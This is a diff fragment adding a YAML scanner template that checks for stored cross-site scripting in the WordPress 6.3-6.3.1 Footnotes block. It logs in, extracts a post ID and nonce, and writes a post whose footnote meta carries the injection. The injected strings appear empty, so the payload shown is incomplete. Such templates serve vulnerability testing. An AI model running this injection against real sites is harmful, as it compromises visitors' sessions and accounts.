490a004630440220221cdd4741e12c68ae20be1b7466c1a5daa5bda899de1e7017c2e659dba0c358022021d77521dec764e6c229ab04868a83b66f2be4b3c778953a3c981b4c56c0b858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/xss/wp-footnote-xss.yaml b/poc/xss/wp-footnote-xss.yaml new file mode 100644 index 0000000000..9af6fd41f7 --- /dev/null +++ b/poc/xss/wp-footnote-xss.yaml @@ -0,0 +1,87 @@ +id: wp-footnote-xss + +info: + name: WordPress 6.3-6.3.1 Footnotes Block - Cross-Site Scripting + author: nqdung2002 + severity: medium + description: | + WordPress does not escape some of its Footnotes block options before outputting them back in a page/post where the block is embed. + impact: | + This could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-63-631-authenticatedcontributor-cross-site-scripting-via-footnotes-block?asset_slug=wordpress + - https://wpscan.com/vulnerability/63270b61-dddd-4cc0-a091-a04cb4f682ec/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cwe-id: CWE-79 + metadata: + max-request: 4 + framework: wordpress + tags: wpscan,xss,wp,wordpress,footnote,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/post-new.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-HTTP-Method-Override: PUT + X-WP-Nonce: {{nonce}} + + { + "id": {{postid}}, + "title": "Stored XSS via Footnote Block", + "content": "\n

Test CVE1

\n\n\n", + "meta": { + "footnotes": "[{\"content\":\"\",\"id\":\"testid\"}]" + }, + "status": "pending" + } + + - | + GET /?p={{postid}} HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code_4 == 200' + - 'contains(body_4, "")' + - 'contains(header_4, "text/html")' + condition: and + + extractors: + - type: regex + name: postid + part: body_2 + group: 1 + regex: + - 'post=(\d+)' + internal: true + + - type: regex + name: nonce + part: body_2 + group: 1 + regex: + - 'createNonceMiddleware\(\s"(.*)\"\s\)' + internal: true + +# digest: 4a0a004730450220286bf1fe3dfd6257d48badcbd97cf02115d6200716f48a44f0db64aa7bae592a022100f0c98085b7cfec6178569dcb7bf73f45d94fb18cbb5633054a1fe2eeb6e6809e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file